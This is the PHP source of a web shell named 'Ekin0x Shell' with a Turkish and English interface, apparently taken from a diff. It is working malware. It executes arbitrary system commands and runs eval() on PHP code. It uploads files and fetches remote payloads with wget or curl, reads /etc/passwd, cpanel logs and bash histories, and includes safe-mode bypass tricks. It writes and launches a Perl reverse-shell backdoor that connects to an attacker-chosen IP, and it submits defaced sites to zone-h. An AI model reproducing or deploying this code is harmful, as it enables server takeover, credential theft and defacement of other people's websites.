";} + function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); + $nscmd=htmlspecialchars($scmd);print $nscmd;} + elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); + $ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} + elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); + while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; + print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ + ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ + ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); + print htmlspecialchars($pret);}} + function input($type,$name,$value,$size) + {if (empty($value)){print "";} + elseif(empty($name)&&empty($size)){print "";} + elseif(empty($size)){print "";} + else {print "";}} + function permcol($path){if (is_writable($path)){print ""; + callperms($path); print "";} + elseif (!is_readable($path)&&!is_writable($path)){print ""; + callperms($path); print "";} + else {print "";callperms($path);}} + if ($dlink=="dwld"){download($_REQUEST['dwld']);} + function download($dwfile) {$size = filesize($dwfile); + @header("Content-Type: application/force-download;name=$dwfile"); + @header("Content-Transfer-Encoding: binary"); + @header("Content-Length: $size"); + @header("Content-Disposition: attachment; filename=$dwfile"); + @header("Expires: 0"); + @header("Cache-Control: no-cache, must-revalidate"); + @header("Pragma: no-cache"); + @readfile($dwfile); exit;} + ?> + + + Ekin0x Shell + + + + + + + + ";$ef=""; + $st=""; + $et="
";$c1=""; + $c2="";$ec=""; + $sta=""; + $sfnt="";$efnt=""; + ################# Ending of common variables ######################## + + print"";print"";print"
"; print"
## Ekin0x Shell ## +
"; print"
";print "
"; + print"";print"";print"
"; print"
";print "Home"; + print " - Geri"; + print " - phpinfo"; + if ($dlink=='phpinfo'){print phpinfo();die();} + print " - Base64 decode"; + print " - Url decode"; + print " - Url encode"; + print " - Md5"; + print " - Izinleri Kontrol Et"; + print " - File source"; + print " - Quick index"; + print " - Zone-h"; + print " - Mail"; + print " - Cmd help"; + if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase'])); + print "

Result is : $sfnt".$cbase."$efnt"; die();} + if ($dlink=="basepw"){ print "

[ Base64 - Decoder ]"; + print $sf;input ("text","ncbase",$ncbase,35);print " "; + input ("submit","","Decode","");print $ef; die();} + if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld'])); + print "

Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){ + print "

[ Url - Decoder ]"; print $sf; + input ("text","nurld",$nurld,35);print " "; + input ("submit","","Decode","");print $ef; die();} + if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "

Result is : $sfnt".$urlenc."$efnt"; die();} + if ($dlink=='urlen'){print "

[ Url - Encoder ]"; + print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();} + if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf'])); + print "

Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){ + print "

[ MD5 - Encoder ]"; + print $sf;input ("text","nmdf",$nmdf,35);print " "; + input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef; + print "

";print "

";print "

";die();} + function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){ + print "

[ Sorry, U choosed an empty file or the file not exists ]";die();} + elseif(isset($showsc)&&filesize($showsc) !=="0") { + print "

"; + if (!show_source($showsc)||!function_exists('show_source')){print "
[ Sorry can't complete the operation ]
";die();}print "
";die();}}if ($dlink=='showsrc'){ + print "

: Choose a php file to view in a color mode, any extension else will appears as usual :";print "

"; + input ("text","showsc","",35);print " "; + input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));} + if ($dlink=='cmdhlp'){ + print "

: Insert the command below to get help or to know more about it's uses :";print ""; + input ("text","hlp","",35);print " "; + input ("submit","","Help","");print $ef; die();} + if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp']; + print "

[ The command is $sfnt".$hlp."$efnt ]"; + $hlp = escapeshellcmd($hlp);print "

"; + if (!function_exists(shell_exec)&&!function_exists(exec)&& + !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) + {print "
[ Sorry can't complete the operation ]
";}else {print "
";
+ if(!callfuncs("man $hlp | col -b")){print "
[ Finished !! ]";}print "
";}print "
";die();} + if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt'])) + {if (touch ($_REQUEST['indx'])==true){ + $fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt'])); + fclose($fp);print "

[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]

";print "
[ Yeniden Editle + ] -- [ Curr-Dir ]
";die(); }else {print "

[ Sorry, Can't create the index !! ]

";die();}} + if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){ + print $sf."
";print "

"; + input ("text","indx","Index-name",35);print " "; + input ("submit","qindsub","Create","");print $ef;die();} + if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){ + $mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt']; + if (mail($mailto,$subj,$mailtxt)){print "

[ Mail sended to $sfnt".$mailto." $efnt successfully ]

"; die();}else {print "

[ Error, Can't send the mail ]

";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "

[ Error, Can't send the mail ]

";die();} + if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){ + print $sf."
";print "

";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " "; + input ("submit","mailsub","Send-mail","");print $ef;die();} + if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);} + function callzone($nscdir){ + if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";} + else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";} + fwrite ($fpz,"\$arq = @ARGV[0]; + \$grupo = @ARGV[1]; + chomp \$grupo; + open(a,\"<\$arq\"); + @site = ; + close(a); + \$b = scalar(@site); + for(\$a=0;\$a<=\$b;\$a++) + {chomp \$site[\$a]; + if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; } + print \"[+] Sending \$site[\$a]\n\"; + use IO::Socket::INET; + \$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next; + print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\"; + print \$sock \"Accept: */*\r\n\"; + print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\"; + print \$sock \"Accept-Language: pt-br\r\n\"; + print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\"; + print \$sock \"Connection: Keep-Alive\r\n\"; + print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\"; + print \$sock \"Host: old.zone-h.org\r\n\"; + print \$sock \"Content-Length: 385\r\n\"; + print \$sock \"Pragma: no-cache\r\n\"; + print \$sock \"\r\n\"; + print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\"; + close(\$sock);}"); + if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']); + }else{print "

[ Can't complete the operation, try change the current dir with writable one ]
";}$zonet=$_REQUEST['zonet']; + if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) + {print "[ Can't complete the operation !! ]";} + else {callfuncs("chmod 777 $zpl;chmod 777 $li"); + ob_start();callfuncs("perl $zpl $li $zonet");ob_clean(); + print "

[ All sites should be sended to zone-h.org successfully !! ]";die();} + }if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){ + print $sf."
";print "

";input ("text","zonet","Hacker-name",35);print " "; + input ("submit","zonesub","Send","");print $ef;die();} + print "
"; print"
";print "
"; + function inisaf($iniv) { $chkini=ini_get($iniv); + if(($chkini || strtolower($chkini)) !=='on'){print"Kapali ( Guvenlik Yok )";} else{ + print"Acik ( Guvenli )";}}function inifunc($inif){$chkin=ini_get($inif); + if ($chkin==""){print " None";} + else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);} + elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r'); + while (!feof($opop)){ $nval= fgetc($opop);}} + elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ + ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();} + if($nval=$owhich){print"ON";} + else{print"OFF";} } + print""; + print"
"; print"

"; + print"Safe-mode :\t";print inisaf('safe_mode');print "";print"
"; + if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print ""; print""; print""; print""; print""; print""; print""; print "
"; + print "
"; print"
Mysql : "; + callocmd('which mysql','/usr/bin/mysql'); + print"
"; print"
Perl : "; + callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"
"; print"
Gcc : "; + callocmd('which gcc','/usr/bin/gcc'); print"
"; + print"
Curl : "; callocmd('which curl','/usr/bin/curl'); print"
"; print"
GET : "; + callocmd('which GET','/usr/bin/GET'); + print"
";print"
Wget : "; + callocmd('which wget','/usr/bin/wget'); + print"
"; print"
Lynx : "; + callocmd('which lynx','/usr/bin/lynx'); + print"
"; }print "

"; + print "IP Numaran : ".$REMOTE_ADDR."
"; + print "Server IP : ".$SERVER_ADDR.""; + print"
".$SERVER_SIGNATURE.""; + print "Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."
"; + print "Engelli Fonksiyonlar : ";inifunc(disable_functions);print"
"; + print "Kimsin : "; callfuncs('id');print"
Os : "; + if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else { + if (!function_exists(shell_exec)&&!function_exists(exec)&& + !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) + {print php_uname(); print "/";print PHP_OS;} + else {callfuncs('uname -a');}}print"
"; + print"Php-versiyon : ".phpversion(); print"
Current-path : "; + print $nscdir."     [ ";permcol($nscdir);print " ]"; + print"
";print "Shell'in Burda : " .__file__; + print"
Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / "; + print"Bos Alan: "; readable_size(disk_free_space($nscdir)); + print "
"; print"

"; + if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']); + if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; } + else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir'])) + { $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}} + else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){ + $ncfile=trim($_REQUEST['cfile']); + if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);} + else{ $mess3= "Dosya Olustur/Sil";}} + elseif(isset($_REQUEST['delfile'])){ + $ndfile=trim($_REQUEST['cfile']); + if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";} + else {$mess3= "Dosya Olustur/Sil";}} + else {$mess3="Dosya Olustur/Sil";} + class upload{ function upload($file,$tmp){ + $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";} + if (@copy($tmp,$nscdir."/".$file)){ + print "
: $file uploaded successfully :
"; }else{print "
: Error uploading $file :
";} } } } + $obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){ + $ustname=trim ($_REQUEST['ustname']);ob_start(); + if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);} + if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');} + if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');} + if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');} + if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);} + if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);} + if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);} + if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);} + if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();} + if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&& + !isset($_REQUEST['rfiletxt'])){ + if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){ + $files[] = $filename; sort($files);}print "
"; + print"
"; + print ""; + print ""; + print ""; + print ""; + print ""; + print ""; + print ""; + print "";if(strstr(PHP_OS,"Linux")){ + print "";} + print ""; foreach ($files as $nfiles){ + if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");} + if (is_writable("$nscdir/$nfiles")){ + $scmess2= "
Evet";}else {$scmess2="
Hayir";}if (is_readable("$nscdir/$nfiles")){ + $scmess3= "
Evet";}else {$scmess3= "
Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "
Klasör";}else{$scmess4= "
Dosya";} + print"
"; print ""; print ""; + print""; + print ""; + print ""; print "";print ""; if(strstr(PHP_OS,"Linux")){ + print "";} + print ""; print ""; + }print "
"; + print "
Dosyalar";print "
";print "
Boyut";print "
";print "
Yazma";print "
";print "
Okuma";print "
";print "
Tür";print "
";print "
Düzenleme";print "
";print "
Adlandirma";print "
";print "
Indir";print "
";print "
Group";print "
";print "
Izinler";print "
"; + if (is_dir($nfiles)){print "[ $nfiles ]
";}else {print "$nfiles
";} + print"
"; + print "
"; + if (is_dir("$nscdir/$nfiles")){print "Klasör";} + elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";} + print "
"; + print "
$scmess2"; print "
"; + print "
$scmess3"; print "
"; + print "
$scmess4"; print"
";if(is_file("$nscdir/$nfiles")){ + print "
Düzenle";}else {print "
Düzenle
";}print"
";print "
Adlandir";print"
"; + if(is_file("$nscdir/$nfiles")){ + print "
indir";}else {print "
indir
";}print"
"; + print "
";owgr($nfiles); + print "
";print"
";print "
"; + permcol("$nscdir/$nfiles");print "
";print"
";print "
";}else {print "

[ Can't open the Dir, permission denied !! ]

";}} + elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){ + if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "

[ Executed command ][$] : ".$_REQUEST['cmd']."
";} + print "
".$sta; + if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);} + elseif(isset($_REQUEST['eval'])){ + ob_start();eval(stripslashes(trim($_REQUEST['eval']))); + $ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);} + elseif (isset($_REQUEST['subqcmnds'])){ + if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');} + if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');} + if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');} + if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');} + if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');} + if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');} + if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');} + if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');} + if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');} + if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');} + if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');} + if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');} + if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');} + }print $eta."
";} + function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']); + if(is_readable($rfile)&&is_file($rfile)){ + $fp=fopen ($rfile,"r");print"
"; + print "
[ Editing ".basename($rfile)." ] [ Geri ] [ Curr-Dir ]

"; + print $sf."";if (is_writable($rfile)){ + print "
".$ef;}else + {print "
[ Can't edit ".basename($rfile)." ]

";}print "

";} + elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "
[ You selected a wrong file name or you don't have access !! ]

";}} + function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']); + if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+"); + $rfiletxt=stripslashes($_REQUEST['rfiletxt']); + fwrite ($rffp,$rfiletxt);print "
+ [ ".basename($hidrfile)." Saved !! ] + [ Curr-Dir ] [ Edit again ] +

";fclose($rffp);} + else {print "
[ Can't save the file !! ] [ Curr-Dir ] [ Back ]

";}} + if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);} + elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);} + function callperms($chkperms){ + $perms = fileperms($chkperms); + + if (($perms & 0xC000) == 0xC000) { + // Socket + $info = 's'; + } elseif (($perms & 0xA000) == 0xA000) { + // Symbolic Link + $info = 'l'; + } elseif (($perms & 0x8000) == 0x8000) { + // Regular + $info = '-'; + } elseif (($perms & 0x6000) == 0x6000) { + // Block special + $info = 'b'; + } elseif (($perms & 0x4000) == 0x4000) { + // Directory + $info = 'd'; + } elseif (($perms & 0x2000) == 0x2000) { + // Character special + $info = 'c'; + } elseif (($perms & 0x1000) == 0x1000) { + // FIFO pipe + $info = 'p'; + } else { + // Unknown + $info = 'u'; + } + + // Owner + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + + // Group + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + + // World + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); print $info;} + + function readable_size($size) { + + if ($size < 1024) { + print $size . ' B'; + }else {$units = array("kB", "MB", "GB", "TB"); + foreach ($units as $unit) { + $size = ($size / 1024); + if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}} + if($dlink=='ren'&&!isset($_REQUEST['rensub'])){ + print ""; + print "
".$sf;input ("text","ren",$_REQUEST['ren'],20);print " "; + input ("text","renf","New-name",20);print " "; + input ("submit","rensub","Rename" ,"");print $ef;die();}else print ""; + if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){ + if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){ + print"
[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]
";print "";die();}else{print "
[ Yeniden Adlandirilamiyor ]
"; + print "";die();}}function fget($nscdir,$sf,$ef){print "
"; + print "
[ Editing ".basename($_REQUEST['edit'])." ] [ Geri ] [ Curr-Dir ]
"; + print $sf."
"; + if (is_writable($_REQUEST['edit'])){ + print "
".$ef;}else {print "
[ Can't edit + ".basename($_REQUEST['edit'])." ]

";}}function svetxt(){ + $fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){ + $nedittxt=stripslashes($_REQUEST['edittxt']); + fwrite ($fp,$nedittxt);print "
[ ".basename($_REQUEST['edit'])." Saved !! ]
";fclose($fp);}else {print "
[ Can't save the file !! ]
";}} + if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval'])) + {fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt'])) + {svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){ + $fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid); + $fileowner=$fileownerarray['name']; $fileg=filegroup($file); + $groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name']; + print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){ + if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}} + elseif(isset($_REQUEST['mve'])){ + if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);} + }else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";} + if (isset ($_REQUEST['safefile'])){ + $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){ + if(empty($_GET['file'])){if(empty($_POST['file'])){ + print "
[ Please choose a file first to read it using copy() ]
"; + } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}} + $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){ + $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp)); + fclose($zrodlo);echo "
".$sta.htmlspecialchars($tekst).$eta."
";unlink($temp);} else { + print "
Sorry, Can't read the selected file !! +

";}}if (isset ($_REQUEST['inifile'])){ + ini_restore("safe_mode");ini_restore("open_basedir"); + print "
".$sta;
+ if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."
";} + if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);} + function callback($nscdir,$bip,$bport){ + if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";} + if (is_writable($nscdir)){ + $fp=fopen ("back.pl","w");$backpl='back.pl';} + else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';} + fwrite ($fp,"use Socket; + \$system='$epath'; + \$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\"; + echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo; + echo \"[ User perms ][$]\";echo \"`id`\";echo; + echo \"[ Start shell ][$]\";'; + + if (!\$ARGV[0]) { + exit(1); + } + \$host = \$ARGV[0]; + \$port = 80; + if (\$ARGV[1]) { + \$port = \$ARGV[1]; + } + \$proto = getprotobyname('tcp') || die('Unknown Protocol\n'); + socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n'); + my \$target = inet_aton(\$host); + if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) { + die('Unable to Connect\n'); + } + if (!fork( )) { + open(STDIN,'>&SERVER'); + open(STDOUT,'>&SERVER'); + open(STDERR,'>&SERVER'); + print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]'; + print '\n[ A-S-T team ][ Lezr.com ]\n\n'; + system(\$sys);system (\$system); + exit(0); } + ");callfuncs("chmod 777 $backpl"); + ob_start(); + callfuncs("perl $backpl $bip $bport"); + ob_clean(); + print "
[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]
+ [ Check your connection now, if failed try changing the port number ]
+ [ Or Go to a writable dir and then try to connect again ]
+ [ Return to the Current dir ] [ Curr-Dir ] +

";}if (isset($_REQUEST['uback'])){ + $uback=$_REQUEST['uback'];$upip=$_REQUEST['upip']; + if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");} + elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");} + elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}} + delm("# Komut ÇAlistir #");print ""; + print ""; + print ""; + print ""; + print ""; + print ""; + print ""; + delm("");print "
"; + print $st.$c1."
".$mess3.$ec; + print $c2.$sf."
";input("text","cfile","",53); + input("hidden","scdir",$nscdir,0);print "
"; + input("submit","crefile","Olustur",""); + print " ";input("submit","delfile","Sil",""); + print "
".$ef.$ec.$et."
".$st.$c1; + print "
Enter the command to execute";print $ec; + print $c2.$sf."
"; + input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"
"; + input("submit","","Execute","");print "
".$ef.$ec.$et."
";print $st.$c1; + print "
$mess".$ec.$c2.$sf."
"; + input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "
"; + input("submit","credir","Create-D","");print " "; + input("submit","deldir","Delete-D",""); + print "
".$ef.$ec.$et."
";print $st.$c1; + print "
Dosya Düzenle/Oku".$ec;print $c2.$sf."
"; + input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "
"; + input("submit","","Oku-Düzenle","");print "
".$ef.$ec.$et."
";print $st.$c1; + print "
Dizin'i Göster
";print $ec.$c2.$sf."
"; input("text","scdir",$nscdir,59);print"
"; + input("submit","","Göster","");print " "; + input("reset","","R00T","");print "
".$ef.$ec.$et."
";print $st.$c1; + print "
Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."
"; + input("file","upfile","",40);input("hidden","scdir",$nscdir,0); + input("hidden","up",$nscdir,0); + print"
";input("submit","","Upload","");print "
".$ef.$ec.$et."
";print "
"; + print $st.$c1."
Execute php code with eval()
"; + print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); + print " 
"; + input('submit','evsub','Execute');print " "; + input('Reset','','Reset');print " "; + print "
".$ec.$ef.$et; + print "
"; + print $st.$c1."
Execute useful commands
"; + print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); + print "
";print"
"; + print $ec.$ef.$et."
";delm(""); + print ""; + print "
"; + print $st.$c1."
".$cpmvmess."
"; + print $ec.$c2.$sf." ";input("text","ftcpy","File-name",15); + print " To "; + input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " "; + input("submit","cpy","Copy","");print " ";input("submit","mve","Move",""); + print "".$ec.$ef.$et; + print "
"; + print $st.$c1."
Cok kullanilan Komutlar
"; + print $ec.$c2.$sf." ";input("hidden","scdir",$nscdir,0); + print " ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "".$ec.$ef.$et; + print "
";delm(": Safe mode bypass :"); + print ""; + print "
"; + print $st.$c1."
Using copy() function
"; + print $ec.$c2.$sf." ";input("text","safefile",$nscdir,75); + input("hidden","scdir",$nscdir,0);print " "; + input("submit","","Read-F","");print "".$ec.$ef.$et; + print "
"; + print $st.$c1."
Using ini_restore() function
"; + print $ec.$c2.$sf." ";input("text","inifile",$nscdir,75); + input("hidden","scdir",$nscdir,0);print " "; + input("submit","","Read-F","");print "".$ec.$ef.$et; + print "
";delm("# Backdoor Baglantisi #"); + print ""; + print "
"; + print $st.$c1."
Backdoor ile Baglan
"; + print $ec.$c2.$sf." ";input("text","bip",$REMOTE_ADDR,47);print " "; + input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " "; + input("submit","","Connect","");print " ";input("reset","","Reset",""); + print "".$ec.$ef.$et;print "
";print $st.$c1."
Yüklenmis Backdoor
"; + print $ec.$c2.$sf." ";print "";print " "; + input("text","uback","back.pl",23);print " "; + input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect"); + print "".$ec.$ef.$et;print "
"; + print "
"; print"
"; + print"
Copyright is reserved to Ekin0x
[ By Cyber Security TIM Go to : www.cyber-warrior.org ]"; + print"
